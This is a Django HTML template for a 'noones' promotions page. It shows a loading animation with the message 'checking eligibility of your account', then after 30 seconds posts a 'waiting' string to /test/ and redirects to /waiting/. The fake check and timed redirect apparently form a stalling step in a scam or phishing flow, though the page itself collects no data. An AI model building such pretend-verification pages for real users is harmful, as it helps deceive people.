{%load static%}
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">

    <title>noones</title>
    <link rel="icon" type="image/x-icon" href="{%static 'images/favicon_io/favicon-16x16.png' %}">
    <link rel="apple-touch-icon" sizes="180x180" href="{%static 'images/favicon_io/apple-touch-icon.png' %}">
    <link rel="icon" type="image/png" sizes="32x32" href="{%static 'images/favicon_io/favicon-32x32.png' %}">
    <link rel="icon" type="image/png" sizes="16x16" href="{%static 'images/favicon_io/favicon-16x16.png' %}">
    <link rel="manifest" href="{%static 'images/favicon_io/site.webmanifest' %}">

<style>


img {
			display: block;
			margin: 0 auto;
			max-width: 100%;
			height: auto;
		}


body {
 background-image: url({% static 'images/no1.jpeg' %})

}
</style>

  </head>


  <img src="{% static 'images/non2.jpeg' %}" alt="Your Image" />


  <div class="wrapper">


    <div class="circle"></div>
    <div class="circle"></div>
    <div class="circle"></div>
    <div class="shadow"></div>
    <div class="shadow"></div>
    <div class="shadow"></div>
    <span>checking eligibility of your account</span>
</div>



<footer>
<p>
powered by noones@promotions <i class="fa fa-heart"></i>
<a target="_blank" href="">noones promo</a>


<div class="youtubeBtn">
<a target="_blank" href="">
<i class=""></i>
</a>

</div>


  
  
  
  </body>

<script>

const myTimeout = setTimeout(waiting, 30000);





function waiting(){


  var xhr = new XMLHttpRequest();
    xhr.open("POST", "/test/", true);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.setRequestHeader('X-CSRFToken', getCookie('csrftoken'));

    xhr.onreadystatechange = function() {
        if (this.readyState == 4) {
            if (this.status == 200) {
                console.log(this.responseText);
                window.location.href = "/waiting/";
            } else {
                console.log("Error sending string.");
            }
        }
    };
    xhr.send(JSON.stringify({'myString': 'waiting'}));
    xhr.send(JSON.stringify({}));







}





function getCookie(name) {
    var cookieValue = null;
    if (document.cookie && document.cookie !== '') {
        var cookies = document.cookie.split(';');
        for (var i = 0; i < cookies.length; i++) {
            var cookie = cookies[i].trim();
            if (cookie.substring(0, name.length + 1) === (name + '=')) {
                cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                break;
            }
        }
    }
    return cookieValue;
}




</script>





<style>



body{
  padding:0;
  margin:0;
  width:100%;
  height:100vh;
  background-image: url("{% static 'images/non2.jpeg' %}");
	background-repeat: no-repeat;
	background-size: cover;
	background-position: center;
}
.wrapper{
  width:200px;
  height:60px;
  position: absolute;
  left:50%;
  top:50%;
  transform: translate(-50%, -50%);
}
.circle{
  width:20px;
  height:20px;
  position: absolute;
  border-radius: 50%;
  background-color: #fff;
  left:15%;
  transform-origin: 50%;
  animation: circle .5s alternate infinite ease;
}

@keyframes circle{
  0%{
      top:60px;
      height:5px;
      border-radius: 50px 50px 25px 25px;
      transform: scaleX(1.7);
  }
  40%{
      height:20px;
      border-radius: 50%;
      transform: scaleX(1);
  }
  100%{
      top:0%;
  }
}
.circle:nth-child(2){
  left:45%;
  animation-delay: .2s;
}
.circle:nth-child(3){
  left:auto;
  right:15%;
  animation-delay: .3s;
}
.shadow{
  width:20px;
  height:4px;
  border-radius: 50%;
  background-color: rgba(0,0,0,.5);
  position: absolute;
  top:62px;
  transform-origin: 50%;
  z-index: -1;
  left:15%;
  filter: blur(1px);
  animation: shadow .5s alternate infinite ease;
}

@keyframes shadow{
  0%{
      transform: scaleX(1.5);
  }
  40%{
      transform: scaleX(1);
      opacity: .7;
  }
  100%{
      transform: scaleX(.2);
      opacity: .4;
  }
}
.shadow:nth-child(4){
  left: 35%;
  animation-delay: .2s
}
.shadow:nth-child(5){
  left:auto;
  right:5%;
  animation-delay: .3s;
}
.wrapper span{
  position: absolute;
  bottom:85px;
  font-family: 'comic sans';
  font-size: 30px;
  letter-spacing: 10px;
  color: #0e0a0abd;
  left:25%;
}







/*  footer   */
footer {
  background-color: #222;
  color: #fff;
  font-size: 14px;
  bottom: 0;
  position: fixed;
  left: 0;
  right: 0;
  text-align: center;
  z-index: 999;
}

footer p {
  margin: 10px 0;
  font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida  Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
}
footer .fa-heart{
  color: red;
}
footer .fa-dev{
  color: #fff;
}
footer .fa-twitter-square{
color:#1da0f1;
}
footer .fa-instagram{
color: #f0007c;
}
fotter .fa-linkedin{
color:#0073b1;
}
footer .fa-codepen{
color:#fff
}
footer a {
  color: #3c97bf;
  text-decoration: none;
margin-right:5px;
}
.youtubeBtn{
  position: fixed;
  left: 50%;
transform:translatex(-50%);
  bottom: 45px;
  cursor: pointer;
  transition: all .3s;
  vertical-align: middle;
  text-align: center;
  display: inline-block;
}
.youtubeBtn i{
 font-size:20px;
float:left;
}
.youtubeBtn a{
  color:#ff0000;
  animation: youtubeAnim 1000ms linear infinite;
float:right;
}
.youtubeBtn a:hover{
color:#c9110f;
transition:all .3s ease-in-out;
text-shadow: none;
}
.youtubeBtn i:active{
transform:scale(.9);
transition:all .3s ease-in-out;
}
.youtubeBtn span{
  font-family: 'Lato';
  font-weight: bold;
  color: #fff;
  display: block;
  font-size: 12px;
  float: right;
  line-height: 20px;
  padding-left: 5px;

}

@keyframes youtubeAnim{
0%,100%{
  color:#c9110f;
}
50%{
  color:#ff0000;
}
}
/* footer  */



</style>
